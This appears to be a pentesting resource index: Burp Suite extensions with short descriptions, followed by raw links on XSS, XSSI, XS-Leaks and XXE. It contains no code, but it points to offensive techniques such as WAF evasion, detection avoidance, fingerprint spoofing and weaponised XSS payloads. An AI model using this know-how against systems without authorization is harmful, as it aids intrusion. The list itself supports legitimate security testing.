- Burp session handling rules are very powerful. In this episode, we see an example of how to configure Burp to log in automatically or re-activate the session after it detects that the session has become invalid.
- Plugins
- Creating
- Adapting Burp Extensions for Tailored Pentesting
- Developing Burp Suite Extensions - DOYENSEC
- Material for the training "Developing Burp Suite Extensions – From Manual Testing to Security Automation"
- Developing and Debugging Java Burp Extensions with Visual Studio Code - Parsia(2019)
- Burp Extension Generator
- Everything you need about Burp Extension Generation
- Burp Suite Extension Development - Ismail Tasdelen(2022)
- API
- burp-rest-api
- A REST/JSON API to the Burp Suite security tool. Upon successfully building the project, an executable JAR file is created with the Burp Suite Professional JAR bundled in it. When the JAR is launched, it provides a REST/JSON endpoint to access the Scanner, Spider, Proxy and other features of the Burp Suite Professional security tool.
- AuthN/AuthZ-related
- AuthMatrix
- AuthMatrix is a Burp Suite extension that provides a simple way to test authorization in web applications and web services.
- Autorize
- Autorize is an automatic authorization enforcement detection extension for Burp Suite. It was written in Python by Barak Tawily, an application security expert, and Federico Dotta, a security expert at Mediaservice.net. Autorize was designed to help security testers by performing automatic authorization tests. Since the last release, Autorize also performs automatic authentication tests.
- Escalating Privileges like a Pro - Gaurav Narwani
- AutoRepeater
- Burp Suite is an intercepting HTTP Proxy, and it is the defacto tool for performing web application security testing. While Burp Suite is a very useful tool, using it to perform authorization testing is often a tedious effort involving a "change request and resend" loop, which can miss vulnerabilities and slow down testing. AutoRepeater, an open source Burp Suite extension, was developed to alleviate this effort. AutoRepeater automates and streamlines web application authorization testing, and provides security researchers with an easy-to-use tool for automatically duplicating, modifying, and resending requests within Burp Suite while quickly evaluating the differences in responses.
- Uniqueness plugin for Burp Suite
- Makes requests unique based on regular expressions. Handy for registration forms and any other endpoint that requires unique values upon every request.
- Code Scanning
- Collaborator-related
- Running Your Instance of Burp Collaborator Server - blog.fabiopires.pt
- collaborator-everywhere
- A Burp Suite Pro extension which augments your proxy traffic by injecting non-invasive headers designed to reveal backend systems by causing pingbacks to Burp Collaborator
- Diagramming
- PESD Exporter
- Generate security-oriented sequence diagrams and fine-grained parsed traffic from Burp Suite Proxy history.
- Extra-Checks/Scanners
- backslash-powered-scanner
- This extension complements Burp's active scanner by using a novel approach capable of finding and confirming both known and unknown classes of server-side injection vulnerabilities. Evolved from classic manual techniques, this approach reaps many of the benefits of manual testing including casual WAF evasion, a tiny network footprint, and flexibility in the face of input filtering.
- HUNT
- HUNT is a Burp Suite extension to: 1. Identify common parameters vulnerable to certain vulnerability classes; 2. Organize testing methodologies inside of Burp Suite;
- Burp-molly-pack
- Burp-molly-pack is Yandex security checks pack for Burp. The main goal of Burp-molly-pack is to extend Burp checks. Plugins contains Active and Passive security checks.
- burp-suite-error-message-checks
- Burp Suite extension to passively scan for applications revealing server error messages
- Asset Discover
- Burp Suite extension to discover assets from HTTP response using passive scanning.
- Blogpost
- Dr. Watson
- Dr. Watson is a simple Burp Suite extension that helps find assets, keys, subdomains, IP addresses, and other useful information! It's your very own discovery side kick, the Dr. Watson to your Sherlock!
- LinkDumper Burp Plugin
- Extract (links/possible endpoints) from responses & filter them via decoding/sorting
- BurpExtenderHeaderChecks
- SQLTruncScanner
- Messy BurpSuite plugin for SQL Truncation vulnerabilities.
- Asset_Discover
- Burp Suite extension to discover assets from HTTP response using passive scanning.
- Extended-Functionality
- burp-highlighter
- Exporter Extension for Burp Suite
- Exporter is a Burp Suite extension to copy a request to the clipboard as multiple programming languages functions.
- Stepper
- Stepper is designed to be a natural evolution of Burp Suite's Repeater tool, providing the ability to create sequences of steps and define regular expressions to extract values from responses which can then be used in subsequent steps.
- BurpSuiteSharpener
- "This extension should add a number of UI and functional features to Burp Suite to make working with it easier."
- Piper
- Unix-style approach to web application testing - Andras Veres-Szentkiralyi(2020)
- Web application testers of our time have lots of tools at their disposal. Some of these offer the option to be extended in ways the original developers did not think of, thus making the tool more useful. However, developing extensions or plugins has entry barriers in the form of fixed costs, boilerplate, et cetera. At the same time, many problems already have a solution designed as a smaller standalone program, which could be combined in the Unix fashion to produce a useful complex tool quickly and easily. In this paper, a (meta)solution is introduced for this integration problem by lowering the entry barriers, and several examples are offered that demonstrate how it saved time in web application assessments.
- burp-copy-as-ffuf
- Burp Extension that copies a request and builds a FFUF skeleton
- Burp Bounty
- "Burp Bounty (Scan Check Builder in BApp Store) is a extension of Burp Suite that allows you, in a quick and simple way, to improve the active and passive scanner by means of personalized rules through a very intuitive graphical interface."
- Autowasp
- a Burp Suite extension that integrates Burp issues logging, with OWASP Web Security Testing Guide (WSTG), to provide a streamlined web security testing flow
- burpa
- Burp Automator - A Burp Suite Automation Tool. It provides a high level CLI and Python interfaces to Burp Suite scanner and can be used to setup Dynamic Application Security Testing (DAST).
- File Upload
- UploadScanner Burp extension
- A Burp Suite Pro extension to do security tests for HTTP file uploads.
- Forced-Browsing/File Discovery
- BurpSmartBuster
- Looks for files, directories and file extensions based on current requests received by Burp Suite
- J2EE
- J2EEScan
- J2EEScan is a plugin for Burp Suite Proxy. The goal of this plugin is to improve the test coverage during web application penetration tests on J2EE applications.
- JavaScript
- BitMapper
- Burp-suite Extension For finding .map files
- JSONP
- jsonp
- jsonp is a Burp Extension which attempts to reveal JSONP functionality behind JSON endpoints. This could help reveal cross-site script inclusion vulnerabilities or aid in bypassing content security policies.
- JWTs
- JWT4B
- JSON Web Tokens (JWT) support for the Burp Interception Proxy. JWT4B will let you manipulate a JWT on the fly, automate common attacks against JWT and decode it for you in the proxy history. JWT4B automagically detects JWTs in the form of 'Authorization Bearer' headers as well as customizable post body parameters.
- jwt-heartbreaker
- A Burp extension that checks whether a JWT (JSON Web Token) was signed with a key known from public sources.
- Blogpost
- Protobufs
- burp-protobuf-decoder
- A simple Google Protobuf Decoder for Burp
- Blackbox Protobuf
- Blackbox protobuf is a Burp Suite extension for decoding and modifying arbitrary protobuf messages without the protobuf type definition.
- Proxy
- NoPE Proxy
- Non-HTTP Protocol Extension (NoPE) Proxy and DNS for Burp Suite.
- Postman
- Postman-Integration
- Postman Integration is an extension for Burp that generates a Postman collection in JSON format.
- Repeater
- RepeaterSearch
- "This extension adds a search bar to the Repeater tab that can be used to highlight all repeater tabs where the request and/or response matches a query via simple text matching or Regex."
- Bookmarks
- "A Burp Suite extension to bookmark requests for later, instead of those 100 unnamed repeater tabs you've got open."
- SAML
- SAML Raider
- SAML Raider is a Burp Suite extension for testing SAML infrastructures. It contains two core functionalities: manipulating SAML messages and managing X.509 certificates.
- Serialization
- Freddy the Serial(isation) Killer - Deserialization Bug Finder
- A Burp Suite extension to aid in detecting and exploiting serialisation libraries/APIs.
- Single-Page-Apps
- BurpKit
- BurpKit is a BurpSuite plugin which helps in assessing complex web apps that render the contents of their pages dynamically. It also provides a bi-directional Script bridge API which allows users to create quick one-off BurpSuite plugin prototypes which can interact directly with the DOM and Burp's extender API.
- Sitemap
- PwnBack
- Burp Extender plugin that generates a sitemap of a website using Wayback Machine
- SQL Injection
- sqlipy
- SQLiPy is a Python plugin for Burp Suite that integrates SQLMap using the SQLMap API.
- SQLi Query Tampering
- SQLi Query Tampering extends and adds custom Payload Generator/Processor in Burp Suite's Intruder. This extension gives you the flexibility of manual testing with many powerful evasion techniques.
- Swagger
- swurg
- Parses Swagger files into the BurpSuite for automating RESTful API testing – approved by Burp for inclusion in their official BApp Store.
- TLS
- Awesome TLS
- Fix Burp Suite's horrible TLS stack & spoof any browser fingerprint
- Turbo Intruder
- Haptyc
- "Haptyc is a python library which was built to add payload position support and Sniper/Clusterbomb/Batteringram/Pitchfork attack types into Turbo Intruder. While Haptyc accomplishes these goals fairly well it also introduces a simpler way to express test sequences in general. While this library was meant to target Turbo Intruder it has no hard dependencies on Turbo Intruder and can be used anywhere one requires test generation in a Python context. Unfortunately at this time since Haptyc was built for a jython interpreter it only supports Python 2.7 (however future changes will fix this)."
- WAFs
- HTTPSmuggler
- A Burp Suite extension to help pentesters to bypass WAFs or test their effectiveness using a number of techniques. This extension has been developed by Soroush Dalili (@irsdl) from NCC Group.
- Wordlists
- Golden Nuggets
- Burp Suite Extension to easily create Wordlists based off URI, URI Parameters and Single Words (Minus the Domain)
- whey-cewler.py
- "Whey CeWLer runs within Portswigger's Burp Suite and parses an already crawled sitemap to build a custom wordlist."
- XSS
- reflector
- Burp Suite extension is able to find reflected XSS on page in real-time while browsing on web-site
- Other
- C02
- Co2 includes several useful enhancements bundled into a single Java-based Burp extension. The extension has its own configuration tab with multiple sub-tabs (one for each Co2 module). Modules that interact with other Burp tools can be disabled from within the Co2 configuration tab, so there is no need to disable the entire extension when using just part of the functionality.
- distribute-damage
- Designed to make Burp evenly distribute load across multiple scanner targets, this extension introduces a per-host throttle, and a context menu to trigger scans from. It may also come in useful for avoiding detection.
- Office Open XML Editor - burp extension
- Bumpster
- The Unofficial Burp Extension for DNSDumpster.com. You simply supply a domain name and it returns a ton of DNS information and basically lays out the external network topology.
- ParrotNG - burp plugin
- Brida
- Brida is a Burp Suite extension that, working as a bridge between Burp Suite and Frida, lets you use and manipulate applications' own methods while tampering with the traffic exchanged between the applications and their back-end services/servers. It supports all platforms supported by Frida (Windows, macOS, Linux, iOS, Android, and QNX).
- Cyber Security Transformation Chef
- The Cyber Security Transformation Chef (CSTC) is a Burp Suite extension. It is built for security experts to extend Burp Suite by chaining simple operations for each incoming or outgoing message. It can also be used to quickly apply special custom formatting to a message.
- Hackbar
- Hackbar plugin for Burp
- progress-burp
- Burp Suite extension to track vulnerability assessment progress
- Burp Macros
- 101
- Articles/Blogposts/Writeups
- Tools
- CloudFlair
- CloudFlair is a tool to find origin servers of websites protected by CloudFlare that are publicly exposed and don't restrict network access to the CloudFlare IP ranges as they should. The tool uses Internet-wide scan data from Censys to find exposed IPv4 hosts presenting an SSL certificate associated with the target's domain name.
- CloudFire
- This project focuses on discovering potential IPs leaking from behind cloud-proxied services, e.g. Cloudflare. Although there are many ways to tackle this task, we are focusing right now on CrimeFlare database lookups, search engine scraping and other enumeration techniques.
- HackerOne H1-212 Capture the Flag Solution - Corben Douglas
- ebay.com: RCE using CCS
- $10k host header - eze2307
- REMOTE CODE EXECUTION! Recon Wins - vishnuraj
- Analyzing a Creative Attack Chain Used To Compromise A Web Application
- RCE in Hubspot with EL injection in HubL - betterhacker.com
- "This is the story of how I was able to get remote code execution on Hubspot's servers by exploiting a vulnerability in HubL expression language, which is used for creating templates and custom modules within the Hubspot CRM."
- Hacking Slack using postMessage and WebSocket-reconnect to steal your precious token - labs.detectify
- Tools
- Boucan: A Bug Bounty Canary Platform
- This project is an attempt to implement a lightweight Burp Collaborator-esque application and consists of two main components: a DNS server (custom Python implementation with dnslib) and an API. It is still very much in the early days of development. You can think of Boucan as a sort of canary that will notify you when an external asset (DNS record, HTTP server, SMTP server) has been interacted with. This is useful for blind payload injection.
- Keyhacks
- Keyhacks is a repository which shows quick ways in which API keys leaked by a bug bounty program can be checked to see if they're valid.
ToDo links
XSS
https://github.com/EgeBalci/xss-flare
https://medium.com/@spade.com/a-guide-to-make-your-own-serverless-blind-xss-and-blind-oob-payload-18f8f2b9c507
https://ysamm.com/?p=493
https://netsec.expert/posts/xss-in-2021/
https://0xmkr24.medium.com/cross-site-scripting-contexts-walkthrough-portswigger-labs-part-1-aad6cf65e49b
https://securitygoat.medium.com/data-exfiltration-with-some-fun-xss-tricks-49e9251f05fd
https://portswigger.net/research/portable-data-exfiltration
https://swarm.ptsecurity.com/fuzzing-for-xss-via-nested-parsers-condition/
https://www.rcesecurity.com/2020/11/Smuggling-an-un-exploitable-xss/
https://github.com/heroanswer/XSS_Cheat_Sheet_2020_Edition
https://liveoverflow.com/do-not-use-alert-1-in-xss/
https://blog.mozilla.org/attack-and-defense/2021/11/03/finding-and-fixing-dom-based-xss-with-static-analysis/
https://hacklido.com/blog/252-xss-filter-evasion-and-waf-bypassing
https://whynotsecurity.com/blog/xss-to-rce/
https://www.youtube.com/embed/xxKAvx4UeUg
https://www.volkis.com.au/blog/bypass-xss-in-wafs/
https://www.youtube.com/watch?v=mKAWpFdVcPY
https://docs.google.com/presentation/d/130n98LMDyD1xyZp5wzgmjmrZPP-nBcU9tI3NaOVfBs0/preview#slide=id.p
https://github.com/redcode-labs/poXSSon
https://www.youtube.com/watch?v=HU3np5xvioA
https://github.com/kleiton0x00/ppmap
https://www.blackhat.com/presentations/bh-europe-07/Dube-Rios/Whitepaper/bh-eu-07-rios-WP.pdf
https://pentestit.medium.com/hey-dude-do-you-need-script-on-your-page-d9192df990f4
https://twitter.com/orange_8361/status/1333458585980813333
https://www.trustedsec.com/events/webinar-popping-shells-instead-of-alert-boxes-weaponizing-xss-for-fun-and-profit/
https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot
https://web.archive.org/web/20190617111911/https://polyglot.innerht.ml/
https://dev.to/caffiendkitten/xss-javascript-polyglots-4i64
https://bishopfox.com/blog/lexss-bypassing-lexical-parsing-security-controls
https://lutfumertceylan.com.tr/posts/acc-takeover-web-cache-xss/
https://medium.com/bugbountywriteup/content-security-policy-bypass-to-perform-xss-3c8dd0d40c2e
https://knoxss.me/?page_id=766
https://www.youtube.com/watch?v=TgilzlNHFz8
https://github.com/hakluke/weaponised-XSS-payloads
https://twitter.com/intigriti/status/1356245100414840833
https://github.com/yavolo/eventlistener-xss-recon
https://medium.com/@know.0nix/hunting-good-bugs-with-only-html-d8fd40d17b38
https://leucosite.com/Edge-Chromium-EoP-RCE/
https://github.com/hahwul/dalfox
https://www.immersivelabs.com/resources/blog/wagtail-xss-localstorage-account-hijack/
https://portswigger.net/research/redefining-impossible-xss-without-arbitrary-javascript
https://r2c.dev/blog/2021/xss-cheat-sheets/
https://thehackerblog.com/video-download-uxss-exploit-detailed/
https://medium.com/realmodelabs/kindledrip-from-your-kindles-email-address-to-using-your-credit-card-bb93dbfb2a08
https://blog.s1r1us.ninja/bug-bounty/cookie-tossing-to-rce-on-google-cloud-jupyter-notebooks
https://medium.com/bugbountywriteup/intigritis-december-xss-challenge-2020-unintended-solution-8205b4a4b95b
https://chefsecure.com/courses/xss/recipes/polyglots-the-ultimate-xss-payloads
https://medium.com/cyberverse/obfuscated-polyglot-xss-payloads-simplified-with-references-157e95b1d601
https://security.szurek.pl/en/xss-polyglot.html
https://easterxss.terjanq.me/writeup.html
https://www.youtube.com/watch?utm_campaign=bug_bytes_99_bypassing_bots_and_wafs_jq_in_burp_smarter_json_fuzzing_and_subdomain_takeovers
* [AwesomeXSS - Somdev Sangwan](https://github.com/s0md3v/AwesomeXSS)
* Awesome XSS stuff
Cookies
https://medium.com/@agrawalsmart7/cookie-based-injection-xss-making-exploitable-with-out-exploiting-other-vulns-81132ca01d67
https://security.stackexchange.com/questions/36172/is-cookie-based-xss-exploitable
https://wesecureapp.com/2017/07/10/xss-by-tossing-cookies/
http://zhchbin.github.io/2017/08/30/Uber-XSS-via-Cookie/
https://appsecnotes.blogspot.com/2009/11/xss-via-cookie-how-severe.html
http://blog.k3170makan.com/2013/10/aboutme-cookie-based-xss.html
https://blog.jeremiahgrossman.com/2010/02/converting-unimplementable-cookie-based.html
DOM
https://enfinlay.github.io//xss/dom/burp/2021/02/23/dom-xss-is-dead.html
https://vovohelo.medium.com/from-svg-and-back-yet-another-mutation-xss-via-namespace-confusion-for-dompurify-2-2-2-bypass-5d9ae8b1878f
https://github.com/nccgroup/tracy
https://static.sched.com/hosted_files/njsi2019/31/Securing%20the%20DOM%20from%20the%20bottom%20up%20-%20Node%2BJS%20Interactive.pdf
https://www.youtube.com/watch?v=QBkLI35sxVs
https://research.securitum.com/helping-secure-dompurify-part-1/
https://github.com/filedescriptor/untrusted-types
https://thexssrat.medium.com/digging-deep-into-dom-xss-9ed172876477
* [Restricted-character XSS for fun - physuru.dev(2021)](https://web.archive.org/web/20210414031135/https://physuru.dev/blog/restricted_character_xss/)
https://blog.mozilla.org/attack-and-defense/2021/11/03/finding-and-fixing-dom-based-xss-with-static-analysis/
https://portswigger.net/web-security/dom-based/cookie-manipulation
https://owasp.org/www-community/attacks/DOM_Based_XSS
https://portswigger.net/blog/introducing-dom-invader
https://medium.com/@shilpybanerjee/dom-based-cookie-manipulation-portswigger-lab-16ae86de26fc
https://medium.com/bugbountywriteup/reflected-xss-on-microsoft-com-via-angular-template-injection-2e26d80a7fd8
https://medium.com/@lucideus/a-definitive-guide-to-session-hijacking-lucideus-research-71165a672973
https://security.stackexchange.com/questions/176897/how-to-exploit-dom-xss-in-cookies-without-having-xss-on-the-page/176938
https://github.com/wisec/domxsswiki
https://hackerone.com/reports/57356
https://book.hacktricks.xyz/pentesting-web/xss-cross-site-scripting/dom-xss
Talks
* [Tracing User Input Through JavaScript is for Tools - Jake Heath, Michael Roberts(2018)](https://www.youtube.com/watch?v=3zowuWLEGsA&list=PL7D3STHEa66TbZwq9w3S2qWzoJeNo3YYN&index=21)
* Being able to comprehend causal relationships between sources of user input and their corresponding output is a distinguishing characteristic that separates the master web hacker from the novice script kiddy. The better a tester can grasp these relationships, the faster they can abuse lapses in input sanitization, identify dangerous programming patterns, and understand the overall attack surface of the application. However, enumerating these relationships is difficult and time intensive to do by hand, especially with JavaScript-heavy apps. Security scanning tools have tried to automate this procedure, but they face several problems in modern web applications: To solve these problems, we need a tool that augments, not automates, a manual penetration tester by helping them understand all of the inputs and outputs of a web application. To this end, we present Tracy, a tool for assisting penetration testers with enumerating every sink of output for all user input sources.
XSSI
https://blog.cm2.pw/exploiting-post-based-xssi/
https://www.usenix.org/system/files/conference/usenixsecurity15/sec15-paper-lekies.pdf
* [XSSI and JSONP leaks](https://github.com/EdOverflow/bugbountywiki/wiki/XSSI-and-JSONP-leaks)
* [The Tale of a Fameless but Widespread Web Vulnerability Class - Veit Hailperin](https://www.youtube.com/watch?v=5qA0CtS6cZ4)
* [Blogpost](https://www.scip.ch/en/?labs.20160414)
* Two key components account for finding vulnerabilities of a certain class: awareness of the vulnerability and ease of finding the vulnerability. Cross-Site Script Inclusion (XSSI) vulnerabilities are not mentioned in the de facto standard for public attention - the OWASP Top 10. Additionally there is no public tool available to facilitate finding XSSI. The impact reaches from leaking stored personal information, circumvention of token-based protection, to complete compromise of accounts. XSSI vulnerabilities are fairly widespread and the lack of detection increases the risk of each XSSI. In this talk we are going to demonstrate how to find XSSI, exploit XSSI and also how to protect against XSSI.
XS-Leaks
https://arturjanc.com/visited-delenda-est.pdf
XS-Search
https://www.youtube.com/watch?v=HcrQy0C-hEA
https://scarybeastsecurity.blogspot.com/2009/12/cross-domain-search-timing.html
https://www.abortz.net/papers/timingweb.pdf
https://www.owasp.org/images/a/a7/AppSecIL2015_Cross-Site-Search-Attacks_HemiLeibowitz.pdf
https://medium.com/@luanherrera/xs-searching-googles-bug-tracker-to-find-out-vulnerable-source-code-50d8135b7549
https://www.blackhat.com/docs/us-16/materials/us-16-Gelernter-Timing-Attacks-Have-Never-Been-So-Practical-Advanced-Cross-Site-Search-Attacks.pdf
https://sites.google.com/site/bughunteruniversity/nonvuln/xsleaks
https://terjanq.github.io/Bug-Bounty/Google/cache-attack-06jd2d2mz2r0/index.html
https://github.com/xsleaks/xsleaks/wiki/Links
http://sirdarckcat.blogspot.com/2019/03/http-cache-cross-site-leaks.html
XXE
https://www.shielder.it/blog/dont-open-that-xml-xxe-to-rce-in-xml-plugins-for-vs-code-eclipse-theia/
https://gosecure.github.io/xxe-workshop/#0
https://cinzinga.com/XXE-Case-Studies/
https://read.martiandefense.llc/hacking-xml-xml-injection-51bea2edd3a2?gi=5fb445391ec6
https://gosecure.github.io/presentations/2019-06-19-hack_in_paris/HIP2019-Advanced_XXE_Exploitation.pdf
https://gosecure.github.io/presentations/2019-06-19-hack_in_paris/Exercise_1_simple.pdf
https://gosecure.github.io/presentations/2019-06-19-hack_in_paris/Exercise_2_external_dtd.pdf
https://gosecure.github.io/presentations/2019-06-19-hack_in_paris/Exercise_3_php_encoding.pdf
https://gosecure.github.io/presentations/2019-06-19-hack_in_paris/Exercise_4_jar_proto.pdf
https://gosecure.github.io/presentations/2019-06-19-hack_in_paris/Exercise_5_local_dtd.pdf
https://speakerdeck.com/0ang3el/a-hackers-perspective-on-aem-applications-security